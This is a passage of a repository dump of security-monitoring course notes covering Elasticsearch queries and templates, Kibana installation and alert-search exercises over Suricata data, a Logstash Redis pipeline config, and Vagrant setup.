38 | curl -ss -XGET localhost:9200 39 | curl -ss -XGET localhost:9200/_cat/nodes 40 | curl -ss -XGET localhost:9200/_cat/indices 41 | curl -ss -XGET localhost:9200/_cat/shards 42 | ``` 43 | 44 | ---- 45 | next -> [configure basic node](elastic.config.basic.md) 46 | -------------------------------------------------------------------------------- /common/elastic/elastic.mappings.md: -------------------------------------------------------------------------------- 1 | # Fixing mappings 2 | 3 | * https://www.elastic.co/guide/en/elasticsearch/reference/current/mapping.html 4 | * https://www.elastic.co/guide/en/elasticsearch/reference/current/mapping-types.html 5 | * https://www.elastic.co/guide/en/elasticsearch/reference/current/indices-templates.html 6 | * https://raw.githubusercontent.com/markuskont/salt-elasticsearch/master/salt/elasticsearch/etc/elasticsearch/template/suricata.json 7 | * https://www.elastic.co/blog/strings-are-dead-long-live-strings 8 | * https://www.elastic.co/guide/en/elasticsearch/reference/current/multi-fields.html 9 | 10 | ## Templates 11 | 12 | ``` 13 | curl -XGET localhost:9200/_template 14 | ``` 15 | 16 | ``` 17 | { 18 | "order": 0, 19 | "version": 60001, 20 | "index_patterns": [ 21 | "*" 22 | ], 23 | "settings": { 24 | "index": { 25 | "refresh_interval" : "30s", 26 | "number_of_shards" : 3, 27 | "number_of_replicas" : 0 28 | } 29 | }, 30 | "mappings": { 31 | "_default_": { 32 | "dynamic_templates": [ 33 | { 34 | "message_field": { 35 | "path_match": "message", 36 | "match_mapping_type": "string", 37 | "mapping": { 38 | "type": "text", 39 | "norms": false 40 | } 41 | } 42 | }, 43 | { 44 | "string_fields": { 45 | "match": "*", 46 | "match_mapping_type": "string", 47 | "mapping": { 48 | "type": "text", 49 | "norms": false, 50 | "fields": { 51 | "keyword": { 52 | "type": "keyword", 53 | "ignore_above": 256 54 | } 55 | } 56 | } 57 | } 58 | } 59 | ], 60 | "properties": { 61 | "@timestamp": { 62 | "type": "date" 63 | }, 64 | "@version": { 65 | "type": "keyword" 66 | }, 67 | "geoip": { 68 | "dynamic": true, 69 | "properties": { 70 | "ip": { 71 | "type": "ip" 72 | }, 73 | "location": { 74 | "type": "geo_point" 75 | }, 76 | "latitude": { 77 | "type": "half_float" 78 | }, 79 | "longitude": { 80 | "type": "half_float" 81 | } 82 | } 83 | } 84 | } 85 | } 86 | }, 87 | "aliases": {} 88 | } 89 | ``` 90 | 91 | ``` 92 | curl -ss -XPUT localhost:9200/_template/default -d @/vagrant/elastic-default-template.json -H'Content-Type: application/json' 93 | ``` 94 | 95 | ## check for mappings 96 | 97 | ``` 98 | curl -ss -XGET localhost:9200/index-timestamp/_mappings 99 | ``` 100 | 101 | ## Reindex and update_by_query API 102 | 103 | * https://www.elastic.co/guide/en/elasticsearch/reference/current/docs-reindex.html 104 | * https://www.elastic.co/guide/en/elasticsearch/reference/current/tasks.html 105 | * https://www.elastic.co/guide/en/elasticsearch/reference/current/docs-update-by-query.html 106 | -------------------------------------------------------------------------------- /common/elastic/kibana.install.md: -------------------------------------------------------------------------------- 1 | # install kibana 2 | 3 | * https://www.elastic.co/guide/en/kibana/current/deb.html 4 | * https://www.elastic.co/guide/en/kibana/current/_configuring_kibana_on_docker.html 5 | 6 | ## deb package 7 | 8 | ```bash 9 | KIBANA="kibana-6.1.2-amd64.deb" 10 | [[ -f $KIBANA ]] || wget $WGET_PARAMS https://artifacts.elastic.co/downloads/kibana/$KIBANA -O $KIBANA 11 | dpkg -s kibana || dpkg -i $KIBANA > /dev/null 2>&1 12 | 13 | systemctl stop kibana.service 14 | systemctl start kibana.service 15 | 16 | FILE=/etc/kibana/kibana.yml 17 | grep "provisioned" $FILE || cat >> $FILE < [visualize](https://www.elastic.co/guide/en/kibana/current/visualize.html) -> [dashboard](https://www.elastic.co/guide/en/kibana/current/dashboard.html) 6 | * [console](https://www.elastic.co/guide/en/kibana/current/console-kibana.html) -> [query](https://www.elastic.co/guide/en/elasticsearch/reference/current/query-dsl.html) -> [Aggregate](https://www.elastic.co/guide/en/elasticsearch/reference/current/search-aggregations.html) -> [script](/Suricata/suricata/elaScripting.md) 7 | 8 | ## API queries 9 | 10 | ``` 11 | GET suricata-exercise/_search 12 | { 13 | "size": 1, 14 | "query": { 15 | "bool": { 16 | "must": [ 17 | {"term": { 18 | "event_type": { 19 | "value": "alert" 20 | } 21 | }} 22 | ] 23 | } 24 | } 25 | } 26 | ``` 27 | 28 | ``` 29 | GET suricata-exercise/_search 30 | { 31 | "size": 0, 32 | "query": { 33 | "bool": { 34 | "must": [ 35 | { 36 | "terms": { 37 | "event_type.keyword": [ 38 | "alert" 39 | ] 40 | } 41 | } 42 | ] 43 | } 44 | }, 45 | "aggs": { 46 | "tsBucketing": { 47 | "date_histogram": { 48 | "field": "timestamp", 49 | "interval": "hour" 50 | }, 51 | "aggs": { 52 | "alerts": { 53 | "terms": { 54 | "field": "alert.category.keyword", 55 | "size": 15 56 | } 57 | } 58 | } 59 | } 60 | } 61 | } 62 | ``` 63 | 64 | ``` 65 | { 66 | "size": 0, 67 | "query": { 68 | "bool": { 69 | "must": [ 70 | { 71 | "term": { 72 | "event_type": { 73 | "value": "alert" 74 | } 75 | } 76 | }, 77 | { 78 | "term": { 79 | "alert.severity": { 80 | "value": 1 81 | } 82 | } 83 | }, 84 | { 85 | "wildcard": { 86 | "alert.category.keyword": { 87 | "value": "*Web*" 88 | } 89 | } 90 | } 91 | ], 92 | "must_not": [ 93 | { 94 | "term": { 95 | "src_geoip.country_iso_code.keyword": { 96 | "value": "EE" 97 | } 98 | } 99 | } 100 | ] 101 | } 102 | }, 103 | "aggs": { 104 | "signatures": { 105 | "terms": { 106 | "field": "alert.signature.keyword", 107 | "size": 25 108 | } 109 | } 110 | } 111 | } 112 | ``` 113 | 114 | ## tasks 115 | 116 | * Find top signatures per category. 117 | * Which alerts are boring? Apply filter. 118 | * Find interesting content in web application alerts. What prompted those alerts? 119 | * Draw a timeline of attack campaign 120 | -------------------------------------------------------------------------------- /common/elastic/logstash-redis-ela.conf: -------------------------------------------------------------------------------- 1 | input { 2 | redis { 3 | data_type => "list" 4 | host => "redis" 5 | port => 6379 6 | key => "suricata" 7 | tags => ["suricata", "CDMCS", "fromredis"] 8 | } 9 | } 10 | filter { 11 | json { 12 | source => "message" 13 | } 14 | if 'syslog' not in [tags] { 15 | mutate { remove_field => [ "message", "Hostname" ] } 16 | } 17 | } 18 | output { 19 | elasticsearch { 20 | hosts => ["elasticsearch"] 21 | index => "logstash-bigindex" 22 | } 23 | } 24 | -------------------------------------------------------------------------------- /common/vagrant/README.md: -------------------------------------------------------------------------------- 1 | # Vagrant 2 | 3 | * https://github.com/mitchellh/vagrant#vagrant 4 | * https://www.vagrantup.com/docs/why-vagrant/ 5 | * http://slides.com/hillar/vagrant#/ 6 | 7 | ## Vagrant is 8 | * a tool for building complete development environments. 9 | * is a tool for building and distributing development environments. 10 | * an automation tool with a domain-specific language (DSL) that is used to automate the creation of VMs and VM environments. 11 | 12 | ## Install 13 | 14 | * https://www.vagrantup.com/downloads.html 15 | 16 | Please install the latest version from vagrant providers. Package from debian/ubuntu package repos will be out of date and bad things may happen. 17 | 18 | ``` 19 | VAGRANT='' 20 | WGET_OPTS='-q -4' 21 | 22 | wget $WGET_OPTS https://releases.hashicorp.com/vagrant/$VAGRANT/vagrant_$VAGRANT_x86_64.deb 23 | dpkg -i vagrant_$VAGRANT_x86_64.deb 24 | ``` 25 | 26 | ## Getting started 27 | 28 | * https://www.vagrantup.com/docs/getting-started/ 29 | * [prepare](https://www.vagrantup.com/docs/getting-started/project_setup.html) 30 | * [up & ssh](https://www.vagrantup.com/docs/getting-started/up.html) 31 | * [destroy](https://www.vagrantup.com/docs/getting-started/teardown.html) 32 | * [automated provisioning](https://www.vagrantup.com/docs/getting-started/provisioning.html) 33 | * [boxes](https://www.vagrantup.com/docs/getting-started/boxes.html) 34 | 35 | Vagrant is a ruby wrapper/library which allows virtual machines to be automatically deployed for development. Deployment parameters would be stored in local `Vagrantfile`. Provisioning scripts and configuration management tools can be invoked upon first `vagrant up` or subsequent `vagrant provision` commands to automatically deploy and configure software inside the virtual machine. 36 | 37 | ``` 38 | $SHELL = <